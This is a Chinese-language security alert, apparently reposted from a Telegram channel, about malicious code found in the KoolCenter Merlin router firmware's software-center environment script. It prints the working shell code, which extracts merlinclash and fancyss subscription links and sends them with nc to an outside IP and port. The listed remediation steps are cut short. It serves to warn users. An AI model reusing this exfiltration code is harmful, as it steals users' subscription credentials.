>
省流:KoolCenter Merlin Firmware 频道通知,恶意代码被插入了该软件中心的环境变量脚本
>
>
目前恶意代码会检测merlinclash和fancyss的订阅链接,并将其发送到ip地址是45.61.185.105的服务器的6232端口!
>
>
简单来说,这些代码的作用就是偷订阅链接!!
紧急通知!紧急通知!
最近不断有软件中心页面错误,版本变成0.0.0的事件发生,且ssh无法登录,scp也无法使用!
经过排查,这是因为恶意代码被插入了软件中心的环境变量脚本导致的!
恶意代码如下:
```
############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)
if [ ! -z "$links" ]; then
echo "$links" | nc -w 5 45.61.185.105 6232
fi
else
echo_date “”
fi
Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
online_links=$(grep ‘ss_online_links’ /jffs/ksdb/log)
if [ ! -z "$online_links" ]; then
echo "$online_links" | nc -w 5 45.61.185.105 6232
fi
fi
```
以上恶意代码会检测merlinclash和fancyss的订阅链接,并将其发送到ip地址是45.61.185.105的服务器的6232端口!
简单来说,这些代码的作用就是偷订阅链接!!
目前还不知道恶意代码是怎么插入的,我们还在调查!
如果大家遇到这个问题,你的订阅链接大概率已经被泄露!
赶紧采取以下措施:
如果使用了usb2jffs插件:
如果没用usb2jffs插件,执行2,3,5步骤!即可
信息来源:https://t.me/ks_merlin/526